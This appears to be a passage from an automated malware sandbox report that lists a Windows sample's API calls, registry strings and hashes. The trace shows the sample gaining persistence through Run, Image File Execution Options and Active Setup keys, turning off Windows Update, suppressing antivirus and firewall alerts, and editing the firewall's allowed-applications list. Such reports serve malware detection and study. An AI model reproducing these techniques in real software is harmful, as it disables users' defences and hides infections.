                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00404C95
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0AF8,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D30
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,00407379,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407379,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050C3
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,{4D415259-4a4f-4e45-5334-4D4152594a4f},?,SOFTWARE\Microsoft\Active Setup\Installed Components\), ref: 004050CE
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0AA8,?,00411030), ref: 00405125
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407382,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040738E,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,0040751C), ref: 004053F3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,0040751C), ref: 00405402
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,007D0DA0,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,007D0DA0,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(0040736E,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU,?), ref: 00405BF2
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,NoAutoUpdate,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,AntiVirusOverride,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004,?,00000004,?,AntiVirusOverride,00000000,00000004), ref: 00405CF5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,UpdatesDisableNotify,00000000,00000004,?,00000004,?,FirewallDisableNotify,00000000,00000004,?,00000004,?,AntiVirusDisableNotify,00000000,00000004), ref: 00405D0D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407382,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040738E,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00405FC6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407379,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 00406039
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,004074E0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,004074E0,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040751C,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,00407240,?), ref: 0040617C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407588,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407590,00000000,00000001,00407590,00000008,?,00407588,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000000,004075A0,?), ref: 00406204
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407651,00000000,00000001,00407660,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,004075E0,?), ref: 00406271
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,004074E0,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00407527,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00407527,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,00407527,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,00407527,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 004063B8
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040F48A), ref: 00406409
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 00405BE8
                                                                                                                                                                                                              • AntiVirusOverride, xrefs: 00405CB9
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 00404C8B, 00405FBC
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00405B24, 00405B45, 0040602F, 00406050
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Active Setup\Installed Components\, xrefs: 004050B6
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Security Center, xrefs: 00405C92
                                                                                                                                                                                                              • --k33p, xrefs: 00403AD9
                                                                                                                                                                                                              • tmp, xrefs: 00405626, 0040568D
                                                                                                                                                                                                              • {10F5781A-0D97-0F99-EF77-BA382916E579}, xrefs: 00405142
                                                                                                                                                                                                              • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00405D48
                                                                                                                                                                                                              • %02X, xrefs: 004044B2
                                                                                                                                                                                                              • f, xrefs: 00404DAE
                                                                                                                                                                                                              • FirewallDisableNotify, xrefs: 00405CE9
                                                                                                                                                                                                              • {4D415259-4a4f-4e45-5334-4D4152594a4f}, xrefs: 00405083, 004050C8
                                                                                                                                                                                                              • sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{79AABB1D-FADB-7161-3CCB-997899295A29}, xrefs: 00405EA1
                                                                                                                                                                                                              • NoAutoUpdate, xrefs: 00405C0F
                                                                                                                                                                                                              • {9703941E-446E-952F-954A-3DA8A91ED84F}, xrefs: 00404CEA
                                                                                                                                                                                                              • QlC5hT0yHn63XEm5LqJ2OxSkGj2v, xrefs: 00404F8B
                                                                                                                                                                                                              • kernel32.dll, xrefs: 00403A6F, 00405854, 0040587D
                                                                                                                                                                                                              • UpdatesDisableNotify, xrefs: 00405D01
                                                                                                                                                                                                              • AntiVirusDisableNotify, xrefs: 00405CD1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.3816864474.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816776889.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816926527.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3816995713.0000000000408000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817068093.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000003.00000002.3817143820.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadTempTime$DirectoryErrorExitLastNameObjectProcess32SingleSleepSystemWaitlstrcmpi$MutexPathQueryReadStartupThreadwsprintf$FirstInfoNextPointerSizeSnapshotToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityTerminateTickVersionWindows
                                                                                                                                                                                                              • String ID: %02X$--k33p$AntiVirusDisableNotify$AntiVirusOverride$FirewallDisableNotify$NoAutoUpdate$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run$UpdatesDisableNotify$f$kernel32.dll$sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{79AABB1D-FADB-7161-3CCB-997899295A29}$tmp${10F5781A-0D97-0F99-EF77-BA382916E579}${4D415259-4a4f-4e45-5334-4D4152594a4f}${9703941E-446E-952F-954A-3DA8A91ED84F}
                                                                                                                                                                                                              • API String ID: 2347958643-4096272849
                                                                                                                                                                                                              • Opcode ID: 4815703a75f863ab10b100253ed1074a169afd28bfc9926a5a05f6dc8c284ea3
                                                                                                                                                                                                              • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4815703a75f863ab10b100253ed1074a169afd28bfc9926a5a05f6dc8c284ea3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 0040355D Relevance: 23.0, APIs: 15, Instructions: 493networkregistrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,0040F4EE,00000000,00000003,00412170,00000012), ref: 004039EE
